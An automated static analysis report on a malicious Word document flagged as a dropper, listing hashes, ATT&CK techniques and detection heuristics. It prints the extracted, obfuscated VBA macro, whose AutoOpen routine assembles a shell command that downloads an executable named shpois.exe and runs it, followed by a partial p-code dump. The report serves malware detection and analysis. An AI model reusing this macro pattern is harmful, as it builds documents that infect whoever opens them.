Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c6664a174498259…

MALICIOUS

Office (OLE)

Size: 78.0 KB | Created: 2017-02-19 14:23:00 | Authoring application: Microsoft Office Word | First seen: 2017-12-08
MD5: 7a2c905b660647a2609fe11e26d2e673
SHA-1: c2a02bed5aad59e486ab69d072004373b39fba56
SHA-256: 7c6664a17449825922cce2d8e8cbc068a650c5de5f164f4f7caf46c11ea4961d
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The script uses CreateObject to instantiate 'WScript.Shell' and then executes a command that appears to download and run a file named 'shpois.exe'. This indicates the document is a dropper for a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6388439-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6388439-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5555 bytes
SHA-256: 74233ce7a2d2eac849c11027ff571fd5b8da24d73f4555394afd9104409b99ba
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zericaniya"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
MEOEJjUUehw = odjojr.oejiwer
knJnjeJEb = "W"
Set PKpKEoe = CreateObject( _
"" + knJnjeJEb + "scrip" + MEOEJjUUehw)
PKpKEoe.Run MmOeoiwieUr(pdfjtry), 0
End Sub
Function iJEuEHfccE()
Dim mvoHHIHpe
nvsiheUGHr = ojvsjiJIhri
ojoIEihfi = mvoHHIHpe + nvsiheUGHr
VoIeiHELejt = pkejrt.jsojgd
mNEiHEfHWr = VoIeiHELejt + "ect "
iEHHbsBr = odjojr.pdkroy
MoJEhfHWfE = pkejrt.omdsirj
Dim noEIhhuEUt
ojIehfIi = oushejihf + ojeifhOsae
PKeFJINfnJE = "S" + iEHHbsBr + "eb" + MoJEhfHWfE + "t)"
iJEuEHfccE = mNEiHEfHWr + PKeFJINfnJE
End Function


Attribute VB_Name = "KHdryy"
Function MmOeoiwieUr(pdfjtry)
KJeUEHgEt = odjojr.Caption + "loadFile"
mOEjjHE = "('" + nsiiueut.vnsoie + nsiiueut.ivjsie + nsiiueut.misdjis + nsiiueut.uhsueh + nsiiueut.ojsjeit + "','%" + odjojr.pkOe + "%\shpois.exe');"
PKDfOJEOJf = "tar"
MoJEfhHEoW = "S" + PKDfOJEOJf + "t-Process '%" + odjojr.pkOe + "%\shpois.exe';"
KdvUUEghEit = KJeUEHgEt + mOEjjHE + MoJEfhHEoW
niEhfEWifJ = pkejrt.Caption + pkejrt.osjiet + pkejrt.mfteyr
LfOWjWIrJWr = niEhfEWifJ + zericaniya.iJEuEHfccE + KdvUUEghEit
MmOeoiwieUr = odjojr.mosiet + " /c  " + LfOWjWIrJWr + ""
End Function

Attribute VB_Name = "odjojr"
Attribute VB_Base = "0{A8F01310-F89F-43E9-818F-DC5D24BB68FE}{AE4084A6-E80E-4A34-B4AC-0A36C2CC1255}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pkejrt"
Attribute VB_Base = "0{DF94BA57-7683-4356-AC8A-590B427370C6}{69986F3D-C91A-4ECE-929C-33AAEC7F29CE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "nsiiueut"
Attribute VB_Base = "0{17804BE7-04DC-4560-AF0B-E6DCF1B19664}{81B5E1C5-634F-47FD-B7A1-0B6C52A16989}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Processing file: /opt/analyzer/scan_staging/28a69fe70404437b95585ec032db4bff.bin
' ===============================================================================
' Module streams:
' Macros/VBA/zericaniya - 2457 bytes
' Line #0:
' 	FuncDefn (Sub knJnjeJEb())
' Line #1:
' 	Ld CreateObject 
' 	MemLd Run 
' 	St PKpKEoe 
' Line #2:
' 	LitStr 0x0001 "W"
' 	St MmOeoiwieUr 
' Line #3:
' 	LineCont 0x0004 05 00 00 00
' 	SetStmt 
' 	LitStr 0x0000 ""
' 	Ld MmOeoiwieUr 
' 	Add 
' 	LitStr 0x0005 "scrip"
' 	Add 
' 	Ld PKpKEoe 
' 	Add 
' 	ArgsLd iJEuEHfccE 0x0001 
' 	Set pdfjtry 
' Line #4:
' 	Ld ojvsjiJIhri 
' 	ArgsLd nvsiheUGHr 0x0001 
' 	LitDI2 0x0000 
' 	Ld pdfjtry 
' 	ArgsMemCall mvoHHIHpe 0x0002 
' Line #5:
' 	EndSub 
' Line #6:
' 	FuncDefn (Function ojoIEihfi(id_FFFE As Variant))
' Line #7:
' 	Dim 
' 	VarDefn VoIeiHELejt
' Line #8:
' 	Ld jsojgd 
' 	St pkejrt 
' Line #9:
' 	Ld VoIeiHELejt 
' 	Ld pkejrt 
' 	Add 
' 	St mNEiHEfHWr 
' Line #10:
' 	Ld pdkroy 
' 	MemLd MoJEhfHWfE 
' 	St iEHHbsBr 
' Line #11:
' 	Ld iEHHbsBr 
' 	LitStr 0x0004 "ect "
' 	Add 
' 	St omdsirj 
' Line #12:
' 	Ld CreateObject 
' 	MemLd ojIehfIi 
' 	St noEIhhuEUt 
' Line #13:
' 	Ld pdkroy 
' 	MemLd ojeifhOsae 
' 	St oushejihf 
' Line #14:
' 	Dim 
' 	VarDefn PKeFJINfnJE
' Line #15:
' 	Ld KJeUEHgEt 
' 	Ld Caption 
' 	Add 
' 	St KHdryy 
' Line #16:
' 	LitStr 0x0001 "S"
' 	Ld noEIhhuEUt 
' 	Add 
' 	LitStr 0x0002 "eb"
' 	Add 
' 	Ld oushejihf 
' 	Add 
' 	LitStr 0x0002 "t)"
' 	Add 
' 	St mOEjjHE 
' Line #17:
' 	Ld omdsirj 
' 	Ld mOEjjHE 
' 	Add 
' 	St ojoIEihfi 
' Line #18:
' 	EndFunc 
' Line #19:
' Macros/VBA/KHdryy - 1922 bytes
' Line #0:
' 	Fu
... (truncated)